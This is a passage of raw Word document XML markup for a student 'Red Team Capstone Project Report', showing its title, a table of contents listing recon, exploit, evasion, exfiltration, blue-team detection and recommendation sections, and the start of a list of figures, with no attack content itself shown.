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71A492">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0354D26D">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B29591">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="51B3C60D">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656DEC31">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDA8258">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7474B99A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41BD8E14">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8BC4C0">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46C4C2F3">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Red Team Capstone Project Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AB549">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0645C8FE">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="153F5C14">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A87534">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B7313A">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BF8F5F">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="056AEF55">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305AC362">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="178757B3">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704F6EFE">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E72BE8">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9D8D62">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1FAB0B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Table of contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B3E100">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc12213 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab Objective</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12213 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EA6ABC">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc13233 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Executive Summary &amp; Findings</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc13233 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B41F36A">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc23520 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Non-Executive Summary</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc23520 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3EE249">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc12189 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Engagement Overview</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc12189 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1212ADF0">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc21884 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Phase-wise Actions &amp; MITRE Techniques</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21884 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="595EB1B5">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc11981 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Recon</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc11981 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBEFD24">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc30591 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc30591 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A6F9BD">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc16172 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Evasion Tests</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc16172 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="551178ED">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc25547 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Exfil</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc25547 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7931B">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc8236 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Blue Team Detection &amp; Analysis</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc8236 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="191398B7">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc21691 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21691 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFEEFBE">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc169 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>APPENDIX A</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc169 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000016">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List of Figures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A1DF71">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve">TOC \t "Heading 4" \h \c</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc9502 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shows log event being created</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc9502 \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="694ACC5C">
      <w:pPr>
        <w:pStyle w:val="19"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="9029"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK \l _Toc32126 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
